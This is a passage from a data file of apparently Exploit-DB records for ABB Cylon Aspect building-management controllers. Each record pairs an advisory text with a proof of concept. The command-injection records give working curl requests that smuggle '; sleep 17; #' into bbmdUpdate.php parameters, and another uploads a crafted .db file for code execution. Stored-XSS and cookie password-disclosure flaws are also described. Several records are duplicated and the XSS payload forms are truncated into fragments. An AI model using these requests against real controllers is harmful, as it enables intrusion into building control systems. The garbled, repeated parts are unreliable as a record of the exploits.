░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n$ curl http://192.168.73.31/bbmdUpdate.php \\\n> -H \"Cookie: PHPSESSID=xxx\" \\\n> -d \"rowCount=2&\\\n> ip1=192.168.1.1&\\\n> port1=47808&\\\n> hexMask1=0xFFFF&\\\n> remove1=0&\\\n> ip2=192.168.1.2&\\\n> port2=47809&\\\n> hexMask2=0xFFFF; sleep 17; #&\\\n> remove2=0&\\\n> submit=Submit\n\n$ curl http://192.168.73.31/bbmdUpdate.php \\\n> -H \"Cookie: PHPSESSID=xxx\" \\\n> -d \"rowCountNAT=2&\\\n> NATip1=192.168.1.1&\\\n> NATport1=2222&\\\n> NAThexMask1=0xFFFF&\\\n> NATremove1=7&\\\n> NATip2=192.168.1.2&\\\n> NATport2=2223&\\\n> NAThexMask2=0xFFFF; sleep 17; #&\\\n> NATremove2=0&\\\n> submit=Submit", "cve_id": "CVE-2024-6516", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "2ded21e4f65db8278884", "text": "ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution\n\nABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.08.02\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated\nblind command injection vulnerability. Input passed to several POST parameters\nis not properly sanitized when writing files, allowing attackers to execute\narbitrary shell commands on the system. There is also an off-by-one error in\narray access that could lead to undefined behavior and potential DoS.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n ErgoTech MIX Deployment Server 2.0.0\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5903\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php\nCVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n$ curl http://192.168.73.31/bbmdUpdate.php \\\n> -H \"Cookie: PHPSESSID=xxx\" \\\n> -d \"rowCount=2&\\\n> ip1=192.168.1.1&\\\n> port1=47808&\\\n> hexMask1=0xFFFF&\\\n> remove1=0&\\\n> ip2=192.168.1.2&\\\n> port2=47809&\\\n> hexMask2=0xFFFF; sleep 17; #&\\\n> remove2=0&\\\n> submit=Submit\n\n$ curl http://192.168.73.31/bbmdUpdate.php \\\n> -H \"Cookie: PHPSESSID=xxx\" \\\n> -d \"rowCountNAT=2&\\\n> NATip1=192.168.1.1&\\\n> NATport1=2222&\\\n> NAThexMask1=0xFFFF&\\\n> NATremove1=7&\\\n> NATip2=192.168.1.2&\\\n> NATport2=2223&\\\n> NAThexMask2=0xFFFF; sleep 17; #&\\\n> NATremove2=0&\\\n> submit=Submit", "cve_id": "CVE-2024-51550", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "2ded21e4f65db8278884", "text": "ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution\n\nABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.08.02\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated\nblind command injection vulnerability. Input passed to several POST parameters\nis not properly sanitized when writing files, allowing attackers to execute\narbitrary shell commands on the system. There is also an off-by-one error in\narray access that could lead to undefined behavior and potential DoS.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n ErgoTech MIX Deployment Server 2.0.0\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5903\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php\nCVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n$ curl http://192.168.73.31/bbmdUpdate.php \\\n> -H \"Cookie: PHPSESSID=xxx\" \\\n> -d \"rowCount=2&\\\n> ip1=192.168.1.1&\\\n> port1=47808&\\\n> hexMask1=0xFFFF&\\\n> remove1=0&\\\n> ip2=192.168.1.2&\\\n> port2=47809&\\\n> hexMask2=0xFFFF; sleep 17; #&\\\n> remove2=0&\\\n> submit=Submit\n\n$ curl http://192.168.73.31/bbmdUpdate.php \\\n> -H \"Cookie: PHPSESSID=xxx\" \\\n> -d \"rowCountNAT=2&\\\n> NATip1=192.168.1.1&\\\n> NATport1=2222&\\\n> NAThexMask1=0xFFFF&\\\n> NATremove1=7&\\\n> NATip2=192.168.1.2&\\\n> NATport2=2223&\\\n> NAThexMask2=0xFFFF; sleep 17; #&\\\n> NATremove2=0&\\\n> submit=Submit", "cve_id": "CVE-2024-48839", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "2752292ae5632b45107c", "text": "ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting\n\nABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) Stored Cross-Site Scripting\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.08.02\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The ABB BMS/BAS controller suffers from an authenticated stored cross-site\nscripting vulnerability. Input passed to the 'host' POST parameter is not\nproperly sanitised before being returned to the user. This can be exploited\nto execute arbitrary HTML/JS code in a user's browser session in context of\nan affected site.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n ErgoTech MIX Deployment Server 2.0.0\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5906\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5906.php\nCVE ID: CVE-2024-6516\nCVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516\n\n\n21.04.2024\n\n-->\n\n\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n\n
\n \n \" />\n \n
\n\n", "cve_id": "CVE-2024-6516", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "b8abccd5a964b04bb7fa", "text": "ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting\n\nABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.08.02\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated\nstored cross-site scripting (XSS) vulnerability. This can be exploited by\nuploading a malicious .txt file containing an XSS payload, which is stored\non the server and served back to users. Although the filename is sanitized\nvia the filename POST parameter, the file contents are not inspected or\nsanitized, allowing attackers to inject arbitrary client-side scripts that\nexecute in the context of any user accessing the infected file or related\nweb page (license.php). To bypass file upload checks, the request must include\nthe Variant string enabling the upload process for potential exploitation.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n ErgoTech MIX Deployment Server 2.0.0\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5905\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php\nCVE ID: CVE-2024-6516\nCVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516\n\n\n21.04.2024\n\n-->\n\n\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n\n \n \n
\n \n
\n \n", "cve_id": "CVE-2024-6516", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "7756075ec47b9443f591", "text": "ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution\n\nABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution\n\n\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.08.02\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated\nOS command injection vulnerability. This can be exploited to inject and execute\narbitrary shell commands through the contents of an uploaded .db file, which\nis passed to the copyFile.sh script. Although the filename is sanitized, the\ncontents of the .db file are not, allowing attackers to inject malicious commands\nthat are executed on the server.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n ErgoTech MIX Deployment Server 2.0.0\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5904\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php\nCVE ID: CVE-2024-48839\nCVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n$ curl -s http://192.168.73.31/uploadDb.php \\\n> -H \"Cookie: PHPSESSID=xxx\" \\\n> -F \"userfile=@testingus.db\"\n\n$ curl http://192.168.73.31/database/testingus.db", "cve_id": "CVE-2024-48839", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "44bae2a76871c4c6520d", "text": "ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure\n\nABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.08.02\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The application suffers from cleartext transmission and storage of\nsensitive information in a Cookie. This includes the globals parameter, where\nauthdata contains base64-encoded credentials. A remote attacker can intercept\nthe HTTP Cookie, including authentication credentials, through a man-in-the-middle\nattack, potentially compromising user accounts and sensitive data.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n ErgoTech MIX Deployment Server 2.0.0\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5895\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5895.php\nCVE ID: CVE-2024-51546\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2024-51546\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n 